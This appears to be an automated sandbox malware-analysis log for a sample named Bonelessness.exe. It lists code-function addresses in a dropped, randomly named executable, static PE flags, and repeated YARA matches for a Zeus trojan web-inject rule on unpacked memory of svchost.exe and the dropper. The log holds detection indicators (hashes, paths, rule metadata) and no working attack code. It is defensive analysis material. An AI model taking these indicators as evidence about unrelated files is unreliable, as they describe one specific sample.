Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_013212F0	8_2_013212F0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_013082E0	8_2_013082E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_01313DC0	8_2_01313DC0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012E2CE0	8_2_012E2CE0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0131FF30	8_2_0131FF30
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0131C710	8_2_0131C710
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0131DF00	8_2_0131DF00
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_01319FF0	8_2_01319FF0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0130EE30	8_2_0130EE30
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012E8640	8_2_012E8640
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0131AE40	8_2_0131AE40
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012B51C0	8_2_012B51C0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012840E0	8_2_012840E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012C1330	8_2_012C1330
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012BF300	8_2_012BF300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012BDB10	8_2_012BDB10
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012BB3F0	8_2_012BB3F0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012B0230	8_2_012B0230
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012C2A4D	8_2_012C2A4D
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_01289A40	8_2_01289A40
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012BC240	8_2_012BC240
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0128F540	8_2_0128F540
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012B75A0	8_2_012B75A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012C0590	8_2_012C0590
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012C5410	8_2_012C5410
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_01289C60	8_2_01289C60
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0129E460	8_2_0129E460
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012C0C60	8_2_012C0C60
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012B6C40	8_2_012B6C40
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012BE770	8_2_012BE770
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012B57A0	8_2_012B57A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012B7780	8_2_012B7780
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012C8FC3	8_2_012C8FC3
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012BCEB0	8_2_012BCEB0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012A96E0	8_2_012A96E0

Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe

Code function: String function: 00E11BB0 appears 33 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216

Source: Bonelessness.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 1.3.svchost.exe.39e0000.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.Bonelessness.exe.406400.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.JbrLYfXaOpqnSngA.exe.12e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.JbrLYfXaOpqnSngA.exe.d52000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.36.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.42.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.JbrLYfXaOpqnSngA.exe.8b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3c60000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.34.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.2606000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.a00000.46.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.JbrLYfXaOpqnSngA.exe.a00000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.JbrLYfXaOpqnSngA.exe.c22000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 23.2.JbrLYfXaOpqnSngA.exe.b92000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.Bonelessness.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.15.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.JbrLYfXaOpqnSngA.exe.3012000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.40.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.3c60000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.37.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.JbrLYfXaOpqnSngA.exe.2fe0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.36.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
